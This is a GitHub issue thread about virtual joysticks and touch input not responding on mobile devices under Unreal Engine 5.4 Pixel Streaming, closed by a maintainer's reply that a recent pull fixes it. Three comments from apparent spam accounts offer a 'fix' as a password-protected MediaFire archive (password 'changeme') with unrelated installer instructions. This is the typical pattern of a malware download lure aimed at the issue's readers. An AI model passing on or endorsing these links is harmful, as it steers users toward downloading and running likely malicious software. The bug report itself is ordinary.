### ISSUE TITLE
[BUG] - Virtual Joysticks and touch input unresponsive on IOS / Andorid Devices

### ISSUE THREAD

**Issue by KianL1** [EpicGames/PixelStreamingInfrastructure#259]
**UE Version:**
UE5.4.4

**Frontend Version:**
UE5.4

**Problem component**
Pixel Streaming plugin, Virtual Joysticks

**Description**
I followed the getting started with Pixel Streaming in Unreal Engine guide and the virtual joysticks do not respond to any touch input.
(https://dev.epicgames.com/documentation/en-us/unreal-engine/getting-started-with-pixel-streaming-in-unreal-engine)

I enabled touch input in the player controller and tried to fire a print string using the on touch event but that also didnt work. I've messed around with the input control (Game Only, UI Only, Game + UI) but they had no effect either.

This was performed in a blank 5.4 project, I then created a blank 5.3 project with the matching server's and it performed as expected

**Steps to Reproduce:**
1. Create blank third person template in 5.4
2. Follow Getting started with Pixel Streaming Guide 
3. Connect on mobile device
4. Unresponsive Joysticks
5. Repeat Worflow in 5.3 Project
6. See Functionality work as expected

**Expected behavior**
Touch input to be handled, virtual joysticks to respond to touch input

**Platform (please complete the following information):**
 - Project built on Windows 11 Pro
 - Browser's Used (Chrome, Firefox, Edge)
 - Mobile Devices (Samsung S20, Samsung Fold 5, Iphone 14)

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by mcottontensor** [comment]
Should be fixed with the latest pull. Let me know how it goes.
